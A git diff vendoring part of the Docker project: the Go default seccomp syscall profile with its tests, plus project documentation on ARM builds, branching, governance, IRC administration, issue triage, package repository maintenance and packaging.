+func DefaultProfile() *types.Seccomp { + syscalls := []*types.Syscall{ + { + Names: []string{ + "accept", + "accept4", + "access", + "alarm", + "alarm", + "bind", + "brk", + "capget", + "capset", + "chdir", + "chmod", + "chown", + "chown32", + "clock_getres", + "clock_gettime", + "clock_nanosleep", + "close", + "connect", + "copy_file_range", + "creat", + "dup", + "dup2", + "dup3", + "epoll_create", + "epoll_create1", + "epoll_ctl", + "epoll_ctl_old", + "epoll_pwait", + "epoll_wait", + "epoll_wait_old", + "eventfd", + "eventfd2", + "execve", + "execveat", + "exit", + "exit_group", + "faccessat", + "fadvise64", + "fadvise64_64", + "fallocate", + "fanotify_mark", + "fchdir", + "fchmod", + "fchmodat", + "fchown", + "fchown32", + "fchownat", + "fcntl", + "fcntl64", + "fdatasync", + "fgetxattr", + "flistxattr", + "flock", + "fork", + "fremovexattr", + "fsetxattr", + "fstat", + "fstat64", + "fstatat64", + "fstatfs", + "fstatfs64", + "fsync", + "ftruncate", + "ftruncate64", + "futex", + "futimesat", + "getcpu", + "getcwd", + "getdents", + "getdents64", + "getegid", + "getegid32", + "geteuid", + "geteuid32", + "getgid", + "getgid32", + "getgroups", + "getgroups32", + "getitimer", + "getpeername", + "getpgid", + "getpgrp", + "getpid", + "getppid", + "getpriority", + "getrandom", + "getresgid", + "getresgid32", + "getresuid", + "getresuid32", + "getrlimit", + "get_robust_list", + "getrusage", + "getsid", + "getsockname", + "getsockopt", + "get_thread_area", + "gettid", + "gettimeofday", + "getuid", + "getuid32", + "getxattr", + "inotify_add_watch", + "inotify_init", + "inotify_init1", + "inotify_rm_watch", + "io_cancel", + "ioctl", + "io_destroy", + "io_getevents", + "ioprio_get", + "ioprio_set", + "io_setup", + "io_submit", + "ipc", + "kill", + "lchown", + "lchown32", + "lgetxattr", + "link", + "linkat", + "listen", + "listxattr", + "llistxattr", + "_llseek", + "lremovexattr", + "lseek", + "lsetxattr", + "lstat", + "lstat64", + "madvise", + "memfd_create", + "mincore", + 
"mkdir", + "mkdirat", + "mknod", + "mknodat", + "mlock", + "mlock2", + "mlockall", + "mmap", + "mmap2", + "mprotect", + "mq_getsetattr", + "mq_notify", + "mq_open", + "mq_timedreceive", + "mq_timedsend", + "mq_unlink", + "mremap", + "msgctl", + "msgget", + "msgrcv", + "msgsnd", + "msync", + "munlock", + "munlockall", + "munmap", + "nanosleep", + "newfstatat", + "_newselect", + "open", + "openat", + "pause", + "pipe", + "pipe2", + "poll", + "ppoll", + "prctl", + "pread64", + "preadv", + "prlimit64", + "pselect6", + "pwrite64", + "pwritev", + "read", + "readahead", + "readlink", + "readlinkat", + "readv", + "recv", + "recvfrom", + "recvmmsg", + "recvmsg", + "remap_file_pages", + "removexattr", + "rename", + "renameat", + "renameat2", + "restart_syscall", + "rmdir", + "rt_sigaction", + "rt_sigpending", + "rt_sigprocmask", + "rt_sigqueueinfo", + "rt_sigreturn", + "rt_sigsuspend", + "rt_sigtimedwait", + "rt_tgsigqueueinfo", + "sched_getaffinity", + "sched_getattr", + "sched_getparam", + "sched_get_priority_max", + "sched_get_priority_min", + "sched_getscheduler", + "sched_rr_get_interval", + "sched_setaffinity", + "sched_setattr", + "sched_setparam", + "sched_setscheduler", + "sched_yield", + "seccomp", + "select", + "semctl", + "semget", + "semop", + "semtimedop", + "send", + "sendfile", + "sendfile64", + "sendmmsg", + "sendmsg", + "sendto", + "setfsgid", + "setfsgid32", + "setfsuid", + "setfsuid32", + "setgid", + "setgid32", + "setgroups", + "setgroups32", + "setitimer", + "setpgid", + "setpriority", + "setregid", + "setregid32", + "setresgid", + "setresgid32", + "setresuid", + "setresuid32", + "setreuid", + "setreuid32", + "setrlimit", + "set_robust_list", + "setsid", + "setsockopt", + "set_thread_area", + "set_tid_address", + "setuid", + "setuid32", + "setxattr", + "shmat", + "shmctl", + "shmdt", + "shmget", + "shutdown", + "sigaltstack", + "signalfd", + "signalfd4", + "sigreturn", + "socket", + "socketcall", + "socketpair", + "splice", + "stat", + "stat64", + 
"statfs", + "statfs64", + "symlink", + "symlinkat", + "sync", + "sync_file_range", + "syncfs", + "sysinfo", + "syslog", + "tee", + "tgkill", + "time", + "timer_create", + "timer_delete", + "timerfd_create", + "timerfd_gettime", + "timerfd_settime", + "timer_getoverrun", + "timer_gettime", + "timer_settime", + "times", + "tkill", + "truncate", + "truncate64", + "ugetrlimit", + "umask", + "uname", + "unlink", + "unlinkat", + "utime", + "utimensat", + "utimes", + "vfork", + "vmsplice", + "wait4", + "waitid", + "waitpid", + "write", + "writev", + }, + Action: types.ActAllow, + Args: []*types.Arg{}, + }, + { + Names: []string{"personality"}, + Action: types.ActAllow, + Args: []*types.Arg{ + { + Index: 0, + Value: 0x0, + Op: types.OpEqualTo, + }, + }, + }, + { + Names: []string{"personality"}, + Action: types.ActAllow, + Args: []*types.Arg{ + { + Index: 0, + Value: 0x0008, + Op: types.OpEqualTo, + }, + }, + }, + { + Names: []string{"personality"}, + Action: types.ActAllow, + Args: []*types.Arg{ + { + Index: 0, + Value: 0xffffffff, + Op: types.OpEqualTo, + }, + }, + }, + { + Names: []string{ + "arm_fadvise64_64", + "arm_sync_file_range", + "breakpoint", + "cacheflush", + "set_tls", + }, + Action: types.ActAllow, + Args: []*types.Arg{}, + Includes: types.Filter{ + Arches: []string{"arm", "arm64"}, + }, + }, + { + Names: []string{ + "arch_prctl", + }, + Action: types.ActAllow, + Args: []*types.Arg{}, + Includes: types.Filter{ + Arches: []string{"amd64", "x32"}, + }, + }, + { + Names: []string{ + "modify_ldt", + }, + Action: types.ActAllow, + Args: []*types.Arg{}, + Includes: types.Filter{ + Arches: []string{"amd64", "x32", "x86"}, + }, + }, + { + Names: []string{ + "s390_pci_mmio_read", + "s390_pci_mmio_write", + "s390_runtime_instr", + }, + Action: types.ActAllow, + Args: []*types.Arg{}, + Includes: types.Filter{ + Arches: []string{"s390", "s390x"}, + }, + }, + { + Names: []string{ + "open_by_handle_at", + }, + Action: types.ActAllow, + Args: []*types.Arg{}, + Includes: 
types.Filter{ + Caps: []string{"CAP_DAC_READ_SEARCH"}, + }, + }, + { + Names: []string{ + "bpf", + "clone", + "fanotify_init", + "lookup_dcookie", + "mount", + "name_to_handle_at", + "perf_event_open", + "setdomainname", + "sethostname", + "setns", + "umount", + "umount2", + "unshare", + }, + Action: types.ActAllow, + Args: []*types.Arg{}, + Includes: types.Filter{ + Caps: []string{"CAP_SYS_ADMIN"}, + }, + }, + { + Names: []string{ + "clone", + }, + Action: types.ActAllow, + Args: []*types.Arg{ + { + Index: 0, + Value: syscall.CLONE_NEWNS | syscall.CLONE_NEWUTS | syscall.CLONE_NEWIPC | syscall.CLONE_NEWUSER | syscall.CLONE_NEWPID | syscall.CLONE_NEWNET, + ValueTwo: 0, + Op: types.OpMaskedEqual, + }, + }, + Excludes: types.Filter{ + Caps: []string{"CAP_SYS_ADMIN"}, + Arches: []string{"s390", "s390x"}, + }, + }, + { + Names: []string{ + "clone", + }, + Action: types.ActAllow, + Args: []*types.Arg{ + { + Index: 1, + Value: syscall.CLONE_NEWNS | syscall.CLONE_NEWUTS | syscall.CLONE_NEWIPC | syscall.CLONE_NEWUSER | syscall.CLONE_NEWPID | syscall.CLONE_NEWNET, + ValueTwo: 0, + Op: types.OpMaskedEqual, + }, + }, + Comment: "s390 parameter ordering for clone is different", + Includes: types.Filter{ + Arches: []string{"s390", "s390x"}, + }, + Excludes: types.Filter{ + Caps: []string{"CAP_SYS_ADMIN"}, + }, + }, + { + Names: []string{ + "reboot", + }, + Action: types.ActAllow, + Args: []*types.Arg{}, + Includes: types.Filter{ + Caps: []string{"CAP_SYS_BOOT"}, + }, + }, + { + Names: []string{ + "chroot", + }, + Action: types.ActAllow, + Args: []*types.Arg{}, + Includes: types.Filter{ + Caps: []string{"CAP_SYS_CHROOT"}, + }, + }, + { + Names: []string{ + "delete_module", + "init_module", + "finit_module", + "query_module", + }, + Action: types.ActAllow, + Args: []*types.Arg{}, + Includes: types.Filter{ + Caps: []string{"CAP_SYS_MODULE"}, + }, + }, + { + Names: []string{ + "acct", + }, + Action: types.ActAllow, + Args: []*types.Arg{}, + Includes: types.Filter{ + Caps: 
[]string{"CAP_SYS_PACCT"}, + }, + }, + { + Names: []string{ + "kcmp", + "process_vm_readv", + "process_vm_writev", + "ptrace", + }, + Action: types.ActAllow, + Args: []*types.Arg{}, + Includes: types.Filter{ + Caps: []string{"CAP_SYS_PTRACE"}, + }, + }, + { + Names: []string{ + "iopl", + "ioperm", + }, + Action: types.ActAllow, + Args: []*types.Arg{}, + Includes: types.Filter{ + Caps: []string{"CAP_SYS_RAWIO"}, + }, + }, + { + Names: []string{ + "settimeofday", + "stime", + "adjtimex", + }, + Action: types.ActAllow, + Args: []*types.Arg{}, + Includes: types.Filter{ + Caps: []string{"CAP_SYS_TIME"}, + }, + }, + { + Names: []string{ + "vhangup", + }, + Action: types.ActAllow, + Args: []*types.Arg{}, + Includes: types.Filter{ + Caps: []string{"CAP_SYS_TTY_CONFIG"}, + }, + }, + } + + return &types.Seccomp{ + DefaultAction: types.ActErrno, + ArchMap: arches(), + Syscalls: syscalls, + } +} diff --git a/vendor/github.com/docker/docker/profiles/seccomp/seccomp_test.go b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_test.go new file mode 100644 index 0000000000..134692147b --- /dev/null +++ b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_test.go @@ -0,0 +1,32 @@ +// +build linux + +package seccomp + +import ( + "io/ioutil" + "testing" + + "github.com/docker/docker/oci" +) + +func TestLoadProfile(t *testing.T) { + f, err := ioutil.ReadFile("fixtures/example.json") + if err != nil { + t.Fatal(err) + } + rs := oci.DefaultSpec() + if _, err := LoadProfile(string(f), &rs); err != nil { + t.Fatal(err) + } +} + +func TestLoadDefaultProfile(t *testing.T) { + f, err := ioutil.ReadFile("default.json") + if err != nil { + t.Fatal(err) + } + rs := oci.DefaultSpec() + if _, err := LoadProfile(string(f), &rs); err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/profiles/seccomp/seccomp_unsupported.go b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_unsupported.go new file mode 100644 index 0000000000..f84b20b6d9 --- /dev/null 
+++ b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_unsupported.go @@ -0,0 +1,13 @@ +// +build linux,!seccomp + +package seccomp + +import ( + "github.com/docker/docker/api/types" + "github.com/opencontainers/runtime-spec/specs-go" +) + +// DefaultProfile returns a nil pointer on unsupported systems. +func DefaultProfile(rs *specs.Spec) *types.Seccomp { + return nil +} diff --git a/vendor/github.com/docker/docker/project/ARM.md b/vendor/github.com/docker/docker/project/ARM.md new file mode 100644 index 0000000000..c4d21bf27a --- /dev/null +++ b/vendor/github.com/docker/docker/project/ARM.md @@ -0,0 +1,45 @@ +# ARM support + +The ARM support should be considered experimental. It will be extended step by step in the coming weeks. + +Building a Docker Development Image works in the same fashion as for Intel platform (x86-64). +Currently we have initial support for 32bit ARMv7 devices. + +To work with the Docker Development Image you have to clone the Docker/Docker repo on a supported device. +It needs to have a Docker Engine installed to build the Docker Development Image. + +From the root of the Docker/Docker repo one can use make to execute the following make targets: +- make validate +- make binary +- make build +- make deb +- make bundles +- make default +- make shell +- make test-unit +- make test-integration-cli +- make + +The Makefile does include logic to determine on which OS and architecture the Docker Development Image is built. +Based on OS and architecture it chooses the correct Dockerfile. +For the ARM 32bit architecture it uses `Dockerfile.armhf`. + +So for example in order to build a Docker binary one has to +1. clone the Docker/Docker repository on an ARM device `git clone git@github.com:docker/docker.git` +2. change into the checked out repository with `cd docker` +3. 
execute `make binary` to create a Docker Engine binary for ARM + +## Kernel modules +A few libnetwork integration tests require that the kernel be +configured with "dummy" network interface and has the module +loaded. However, the dummy module may be not loaded automatically. + +To load the kernel module permanently, run these commands as `root`. + + modprobe dummy + echo "dummy" >> /etc/modules + +On some systems you also have to sync your kernel modules. + + oc-sync-kernel-modules + depmod diff --git a/vendor/github.com/docker/docker/project/BRANCHES-AND-TAGS.md b/vendor/github.com/docker/docker/project/BRANCHES-AND-TAGS.md new file mode 100644 index 0000000000..1c6f232524 --- /dev/null +++ b/vendor/github.com/docker/docker/project/BRANCHES-AND-TAGS.md @@ -0,0 +1,35 @@ +Branches and tags +================= + +Note: details of the release process for the Engine are documented in the +[RELEASE-CHECKLIST](https://github.com/docker/docker/blob/master/project/RELEASE-CHECKLIST.md). + +# Branches + +The docker/docker repository should normally have only three living branches at all time, including +the regular `master` branch: + +## `docs` branch + +The `docs` branch supports documentation updates between product releases. This branch allow us to +decouple documentation releases from product releases. + +## `release` branch + +The `release` branch contains the last _released_ version of the code for the project. + +The `release` branch is only updated at each public release of the project. The mechanism for this +is that the release is materialized by a pull request against the `release` branch which lives for +the duration of the code freeze period. When this pull request is merged, the `release` branch gets +updated, and its new state is tagged accordingly. + +# Tags + +Any public release of a compiled binary, with the logical exception of nightly builds, should have +a corresponding tag in the repository. 
+ +The general format of a tag is `vX.Y.Z[-suffix[N]]`: + +- All of `X`, `Y`, `Z` must be specified (example: `v1.0.0`) +- First release candidate for version `1.8.0` should be tagged `v1.8.0-rc1` +- Second alpha release of a product should be tagged `v1.0.0-alpha2` diff --git a/vendor/github.com/docker/docker/project/CONTRIBUTORS.md b/vendor/github.com/docker/docker/project/CONTRIBUTORS.md new file mode 120000 index 0000000000..44fcc63439 --- /dev/null +++ b/vendor/github.com/docker/docker/project/CONTRIBUTORS.md @@ -0,0 +1 @@ +../CONTRIBUTING.md \ No newline at end of file diff --git a/vendor/github.com/docker/docker/project/GOVERNANCE.md b/vendor/github.com/docker/docker/project/GOVERNANCE.md new file mode 100644 index 0000000000..6ae7baf743 --- /dev/null +++ b/vendor/github.com/docker/docker/project/GOVERNANCE.md @@ -0,0 +1,17 @@ +# Docker Governance Advisory Board Meetings + +In the spirit of openness, Docker created a Governance Advisory Board, and committed to make all materials and notes from the meetings of this group public. +All output from the meetings should be considered proposals only, and are subject to the review and approval of the community and the project leadership. 
+ +The materials from the first Docker Governance Advisory Board meeting, held on October 28, 2014, are available at +[Google Docs Folder](https://goo.gl/Alfj8r) + +These include: + +* First Meeting Notes +* DGAB Charter +* Presentation 1: Introductory Presentation, including State of The Project +* Presentation 2: Overall Contribution Structure/Docker Project Core Proposal +* Presentation 3: Long Term Roadmap/Statement of Direction + + diff --git a/vendor/github.com/docker/docker/project/IRC-ADMINISTRATION.md b/vendor/github.com/docker/docker/project/IRC-ADMINISTRATION.md new file mode 100644 index 0000000000..824a14bd51 --- /dev/null +++ b/vendor/github.com/docker/docker/project/IRC-ADMINISTRATION.md @@ -0,0 +1,37 @@ +# Freenode IRC Administration Guidelines and Tips + +This is not meant to be a general "Here's how to IRC" document, so if you're +looking for that, check Google instead. ♥ + +If you've been charged with helping maintain one of Docker's now many IRC +channels, this might turn out to be useful. If there's information that you +wish you'd known about how a particular channel is organized, you should add +deets here! :) + +## `ChanServ` + +Most channel maintenance happens by talking to Freenode's `ChanServ` bot. For +example, `/msg ChanServ ACCESS LIST` will show you a list of everyone +with "access" privileges for a particular channel. + +A similar command is used to give someone a particular access level. For +example, to add a new maintainer to the `#docker-maintainers` access list so +that they can contribute to the discussions (after they've been merged +appropriately in a `MAINTAINERS` file, of course), one would use `/msg ChanServ +ACCESS #docker-maintainers ADD maintainer`. + +To setup a new channel with a similar `maintainer` access template, use a +command like `/msg ChanServ TEMPLATE maintainer +AV` (`+A` for letting +them view the `ACCESS LIST`, `+V` for auto-voice; see `/msg ChanServ HELP FLAGS` +for more details). 
+ +## Troubleshooting + +The most common cause of not-getting-auto-`+v` woes is people not being +`IDENTIFY`ed with `NickServ` (or their current nickname not being `GROUP`ed with +their main nickname) -- often manifested by `ChanServ` responding to an `ACCESS +ADD` request with something like `xyz is not registered.`. + +This is easily fixed by doing `/msg NickServ IDENTIFY OldNick SecretPassword` +followed by `/msg NickServ GROUP` to group the two nicknames together. See +`/msg NickServ HELP GROUP` for more information. diff --git a/vendor/github.com/docker/docker/project/ISSUE-TRIAGE.md b/vendor/github.com/docker/docker/project/ISSUE-TRIAGE.md new file mode 100644 index 0000000000..95cb2f1b95 --- /dev/null +++ b/vendor/github.com/docker/docker/project/ISSUE-TRIAGE.md @@ -0,0 +1,132 @@ +Triaging of issues +------------------ + +Triage provides an important way to contribute to an open source project. Triage helps ensure issues resolve quickly by: + +- Ensuring the issue's intent and purpose is conveyed precisely. This is necessary because it can be difficult for an issue to explain how an end user experiences a problem and what actions they took. +- Giving a contributor the information they need before they commit to resolving an issue. +- Lowering the issue count by preventing duplicate issues. +- Streamlining the development process by preventing duplicate discussions. + +If you don't have time to code, consider helping with triage. The community will thank you for saving them time by spending some of yours. + +### 1. Ensure the issue contains basic information + +Before triaging an issue very far, make sure that the issue's author provided the standard issue information. This will help you make an educated recommendation on how to categorize the issue. 
Standard information that *must* be included in most issues are things such as: + +- the output of `docker version` +- the output of `docker info` +- the output of `uname -a` +- a reproducible case if this is a bug, Dockerfiles FTW +- host distribution and version ( ubuntu 14.04, RHEL, fedora 23 ) +- page URL if this is a docs issue or the name of a man page + +Depending on the issue, you might not feel all this information is needed. Use your best judgement. If you cannot triage an issue using what its author provided, explain kindly to the author that they must provide the above information to clarify the problem. + +If the author provides the standard information but you are still unable to triage the issue, request additional information. Do this kindly and politely because you are asking for more of the author's time. + +If the author does not provide the requested information within a week, close the issue with a kind note stating that the author can request for the issue to be +reopened when the necessary information is provided. + +### 2. Classify the Issue + +An issue can have multiple of the following labels. Typically, a properly classified issue should +have: + +- One label identifying its kind (`kind/*`). +- One or multiple labels identifying the functional areas of interest (`area/*`). +- Where applicable, one label categorizing its difficulty (`exp/*`). + +#### Issue kind + +| Kind             | Description                                                                                                                       | +|------------------|---------------------------------------------------------------------------------------------------------------------------------| +| kind/bug         | Bugs are bugs. The cause may or may not be known at triage time so debugging should be taken into account in the time estimate.   | +| kind/enhancement | Enhancements are not bugs or new features but can drastically improve usability or performance of a project component.            | +| kind/feature     | Functionality or other elements that the project does not currently support. 
Features are new and shiny. | +| kind/question | Contains a user or contributor question requiring a response. | + +#### Functional area + +| Area | +|---------------------------| +| area/api | +| area/builder | +| area/bundles | +| area/cli | +| area/daemon | +| area/distribution | +| area/docs | +| area/kernel | +| area/logging | +| area/networking | +| area/plugins | +| area/project | +| area/runtime | +| area/security | +| area/security/apparmor | +| area/security/seccomp | +| area/security/selinux | +| area/security/trust | +| area/storage | +| area/storage/aufs | +| area/storage/btrfs | +| area/storage/devicemapper | +| area/storage/overlay | +| area/storage/zfs | +| area/swarm | +| area/testing | +| area/volumes | + +#### Platform + +| Platform | +|---------------------------| +| platform/arm | +| platform/darwin | +| platform/ibm-power | +| platform/ibm-z | +| platform/windows | + +#### Experience level + +Experience level is a way for a contributor to find an issue based on their +skill set. Experience types are applied to the issue or pull request using +labels. + +| Level | Experience level guideline | +|------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| exp/beginner | New to Docker, and possibly Golang, and is looking to help while learning the basics. | +| exp/intermediate | Comfortable with golang and understands the core concepts of Docker and looking to dive deeper into the project. | +| exp/expert | Proficient with Docker and Golang and has been following, and active in, the community to understand the rationale behind design decisions and where the project is headed. | + +As the table states, these labels are meant as guidelines. You might have +written a whole plugin for Docker in a personal project and never contributed to +Docker. 
With that kind of experience, you could take on an exp/expert level task. + +#### Triage status + +To communicate the triage status with other collaborators, you can apply status +labels to issues. These labels prevent duplicating effort. + +| Status | Description | +|-------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| status/confirmed | You triaged the issue, and were able to reproduce the issue. Always leave a comment how you reproduced, so that the person working on resolving the issue has a way to set up a test-case. +| status/accepted | Apply to enhancements / feature requests that we think are good to have. Adding this label helps contributors find things to work on. +| status/more-info-needed | Apply this to issues that are missing information (e.g. no `docker version` or `docker info` output, or no steps to reproduce), or require feedback from the reporter. If the issue is not updated after a week, it can generally be closed. +| status/needs-attention | Apply this label if an issue (or PR) needs more eyes. + +### 3. Prioritizing issue + +When, and only when, an issue is attached to a specific milestone, the issue can be labeled with the +following labels to indicate their degree of priority (from more urgent to less urgent). + +| Priority | Description | +|-------------|-----------------------------------------------------------------------------------------------------------------------------------| +| priority/P0 | Urgent: Security, critical bugs, blocking issues. P0 basically means drop everything you are doing until this issue is addressed. | +| priority/P1 | Important: P1 issues are a top priority and a must-have for the next release. | +| priority/P2 | Normal priority: default priority applied. | +| priority/P3 | Best effort: those are nice to have / minor issues. | + +And that's it. 
That should be all the information required for a new or existing contributor to come in and resolve an issue. diff --git a/vendor/github.com/docker/docker/project/PACKAGE-REPO-MAINTENANCE.md b/vendor/github.com/docker/docker/project/PACKAGE-REPO-MAINTENANCE.md new file mode 100644 index 0000000000..3763f8798b --- /dev/null +++ b/vendor/github.com/docker/docker/project/PACKAGE-REPO-MAINTENANCE.md @@ -0,0 +1,74 @@ +# Apt & Yum Repository Maintenance +## A maintainer's guide to managing Docker's package repos + +### How to clean up old experimental debs and rpms + +We release debs and rpms for experimental nightly, so these can build up. +To remove old experimental debs and rpms, and _ONLY_ keep the latest, follow the +steps below. + +1. Checkout docker master + +2. Run clean scripts + +```bash +docker build --rm --force-rm -t docker-dev:master . +docker run --rm -it --privileged \ + -v /path/to/your/repos/dir:/volumes/repos \ + -v $HOME/.gnupg:/root/.gnupg \ + -e GPG_PASSPHRASE \ + -e DOCKER_RELEASE_DIR=/volumes/repos \ + docker-dev:master hack/make.sh clean-apt-repo clean-yum-repo generate-index-listing sign-repos +``` + +3. Upload the changed repos to `s3` (if you host on s3) + +4. Purge the cache, PURGE the cache, PURGE THE CACHE! + +### How to get out of a sticky situation + +Sh\*t happens. We know. Below are steps to get out of any "hash-sum mismatch" or +"gpg sig error" or the likes error that might happen to the apt repo. + +**NOTE:** These are apt repo specific; we have had no experience with anything similar +happening to the yum repo in the past so you can rest easy. + +For each step listed below, move on to the next if the previous didn't work. +Otherwise CELEBRATE! + +1. Purge the cache. + +2. Did you remember to sign the debs after releasing? + +Re-sign the repo with your gpg key: + +```bash +docker build --rm --force-rm -t docker-dev:master . 
+docker run --rm -it --privileged \ + -v /path/to/your/repos/dir:/volumes/repos \ + -v $HOME/.gnupg:/root/.gnupg \ + -e GPG_PASSPHRASE \ + -e DOCKER_RELEASE_DIR=/volumes/repos \ + docker-dev:master hack/make.sh sign-repos +``` + +Upload the changed repo to `s3` (if that is where you host) + +PURGE THE CACHE. + +3. Run Jess' magical, save all, only in case of extreme emergencies, "you are +going to have to break this glass to get it" script. + +```bash +docker build --rm --force-rm -t docker-dev:master . +docker run --rm -it --privileged \ + -v /path/to/your/repos/dir:/volumes/repos \ + -v $HOME/.gnupg:/root/.gnupg \ + -e GPG_PASSPHRASE \ + -e DOCKER_RELEASE_DIR=/volumes/repos \ + docker-dev:master hack/make.sh update-apt-repo generate-index-listing sign-repos +``` + +4. Upload the changed repo to `s3` (if that is where you host) + +PURGE THE CACHE. diff --git a/vendor/github.com/docker/docker/project/PACKAGERS.md b/vendor/github.com/docker/docker/project/PACKAGERS.md new file mode 100644 index 0000000000..46ea8e7b20 --- /dev/null +++ b/vendor/github.com/docker/docker/project/PACKAGERS.md @@ -0,0 +1,307 @@ +# Dear Packager, + +If you are looking to make Docker available on your favorite software +distribution, this document is for you. It summarizes the requirements for +building and running the Docker client and the Docker daemon. + +## Getting Started + +We want to help you package Docker successfully. Before doing any packaging, a +good first step is to introduce yourself on the [docker-dev mailing +list](https://groups.google.com/d/forum/docker-dev), explain what you're trying +to achieve, and tell us how we can help. Don't worry, we don't bite! There might +even be someone already working on packaging for the same distro! + +You can also join the IRC channel - #docker and #docker-dev on Freenode are both +active and friendly. 
+ +We like to refer to Tianon ("@tianon" on GitHub and "tianon" on IRC) as our +"Packagers Relations", since he's always working to make sure our packagers have +a good, healthy upstream to work with (both in our communication and in our +build scripts). If you're having any kind of trouble, feel free to ping him +directly. He also likes to keep track of what distributions we have packagers +for, so feel free to reach out to him even just to say "Hi!" + +## Package Name + +If possible, your package should be called "docker". If that name is already +taken, a second choice is "docker-engine". Another possible choice is "docker.io". + +## Official Build vs Distro Build + +The Docker project maintains its own build and release toolchain. It is pretty +neat and entirely based on Docker (surprise!). This toolchain is the canonical +way to build Docker. We encourage you to give it a try, and if the circumstances +allow you to use it, we recommend that you do. + +You might not be able to use the official build toolchain - usually because your +distribution has a toolchain and packaging policy of its own. We get it! Your +house, your rules. The rest of this document should give you the information you +need to package Docker your way, without denaturing it in the process. 
+ +## Build Dependencies + +To build Docker, you will need the following: + +* A recent version of Git and Mercurial +* Go version 1.6 or later +* A clean checkout of the source added to a valid [Go + workspace](https://golang.org/doc/code.html#Workspaces) under the path + *src/github.com/docker/docker* (unless you plan to use `AUTO_GOPATH`, + explained in more detail below) + +To build the Docker daemon, you will additionally need: + +* An amd64/x86_64 machine running Linux +* SQLite version 3.7.9 or later +* libdevmapper version 1.02.68-cvs (2012-01-26) or later from lvm2 version + 2.02.89 or later +* btrfs-progs version 3.16.1 or later (unless using an older version is + absolutely necessary, in which case 3.8 is the minimum) +* libseccomp version 2.2.1 or later (for build tag seccomp) + +Be sure to also check out Docker's Dockerfile for the most up-to-date list of +these build-time dependencies. + +### Go Dependencies + +All Go dependencies are vendored under "./vendor". They are used by the official +build, so the source of truth for the current version of each dependency is +whatever is in "./vendor". + +To use the vendored dependencies, simply make sure the path to "./vendor" is +included in `GOPATH` (or use `AUTO_GOPATH`, as explained below). + +If you would rather (or must, due to distro policy) package these dependencies +yourself, take a look at "vendor.conf" for an easy-to-parse list of the +exact version for each. + +NOTE: if you're not able to package the exact version (to the exact commit) of a +given dependency, please get in touch so we can remediate! Who knows what +discrepancies can be caused by even the slightest deviation. We promise to do +our best to make everybody happy. + +## Stripping Binaries + +Please, please, please do not strip any compiled binaries. This is really +important. 
+ +In our own testing, stripping the resulting binaries sometimes results in a +binary that appears to work, but more often causes random panics, segfaults, and +other issues. Even if the binary appears to work, please don't strip. + +See the following quotes from Dave Cheney, which explain this position better +from the upstream Golang perspective. + +### [go issue #5855, comment #3](https://code.google.com/p/go/issues/detail?id=5855#c3) + +> Super super important: Do not strip go binaries or archives. It isn't tested, +> often breaks, and doesn't work. + +### [launchpad golang issue #1200255, comment #8](https://bugs.launchpad.net/ubuntu/+source/golang/+bug/1200255/comments/8) + +> To quote myself: "Please do not strip Go binaries, it is not supported, not +> tested, is often broken, and doesn't do what you want" +> +> To unpack that a bit +> +> * not supported, as in, we don't support it, and recommend against it when +> asked +> * not tested, we don't test stripped binaries as part of the build CI process +> * is often broken, stripping a go binary will produce anywhere from no, to +> subtle, to outright execution failure, see above + +### [launchpad golang issue #1200255, comment #13](https://bugs.launchpad.net/ubuntu/+source/golang/+bug/1200255/comments/13) + +> To clarify my previous statements. +> +> * I do not disagree with the debian policy, it is there for a good reason +> * Having said that, it stripping Go binaries doesn't work, and nobody is +> looking at making it work, so there is that. +> +> Thanks for patching the build formula. + +## Building Docker + +Please use our build script ("./hack/make.sh") for all your compilation of +Docker. If there's something you need that it isn't doing, or something it could +be doing to make your life as a packager easier, please get in touch with Tianon +and help us rectify the situation. 
Chances are good that other packagers have +probably run into the same problems and a fix might already be in the works, but +none of us will know for sure unless you harass Tianon about it. :) + +All the commands listed within this section should be run with the Docker source +checkout as the current working directory. + +### `AUTO_GOPATH` + +If you'd rather not be bothered with the hassles that setting up `GOPATH` +appropriately can be, and prefer to just get a "build that works", you should +add something similar to this to whatever script or process you're using to +build Docker: + +```bash +export AUTO_GOPATH=1 +``` + +This will cause the build scripts to set up a reasonable `GOPATH` that +automatically and properly includes both docker/docker from the local +directory, and the local "./vendor" directory as necessary. + +### `DOCKER_BUILDTAGS` + +If you're building a binary that may need to be used on platforms that include +AppArmor, you will need to set `DOCKER_BUILDTAGS` as follows: +```bash +export DOCKER_BUILDTAGS='apparmor' +``` + +If you're building a binary that may need to be used on platforms that include +SELinux, you will need to use the `selinux` build tag: +```bash +export DOCKER_BUILDTAGS='selinux' +``` + +If you're building a binary that may need to be used on platforms that include +seccomp, you will need to use the `seccomp` build tag: +```bash +export DOCKER_BUILDTAGS='seccomp' +``` + +There are build tags for disabling graphdrivers as well. By default, support +for all graphdrivers are built in. 
+ +To disable btrfs: +```bash +export DOCKER_BUILDTAGS='exclude_graphdriver_btrfs' +``` + +To disable devicemapper: +```bash +export DOCKER_BUILDTAGS='exclude_graphdriver_devicemapper' +``` + +To disable aufs: +```bash +export DOCKER_BUILDTAGS='exclude_graphdriver_aufs' +``` + +NOTE: if you need to set more than one build tag, space separate them: +```bash +export DOCKER_BUILDTAGS='apparmor selinux exclude_graphdriver_aufs' +``` + +### Static Daemon + +If it is feasible within the constraints of your distribution, you should +seriously consider packaging Docker as a single static binary. A good comparison +is Busybox, which is often packaged statically as a feature to enable mass +portability. Because of the unique way Docker operates, being similarly static +is a "feature". + +To build a static Docker daemon binary, run the following command (first +ensuring that all the necessary libraries are available in static form for +linking - see the "Build Dependencies" section above, and the relevant lines +within Docker's own Dockerfile that set up our official build environment): + +```bash +./hack/make.sh binary +``` + +This will create a static binary under +"./bundles/$VERSION/binary/docker-$VERSION", where "$VERSION" is the contents of +the file "./VERSION". This binary is usually installed somewhere like +"/usr/bin/docker". + +### Dynamic Daemon / Client-only Binary + +If you are only interested in a Docker client binary, you can build using: + +```bash +./hack/make.sh binary-client +``` + +If you need to (due to distro policy, distro library availability, or for other +reasons) create a dynamically compiled daemon binary, or if you are only +interested in creating a client binary for Docker, use something similar to the +following: + +```bash +./hack/make.sh dynbinary-client +``` + +This will create "./bundles/$VERSION/dynbinary-client/docker-$VERSION", which for +client-only builds is the important file to grab and install as appropriate. 
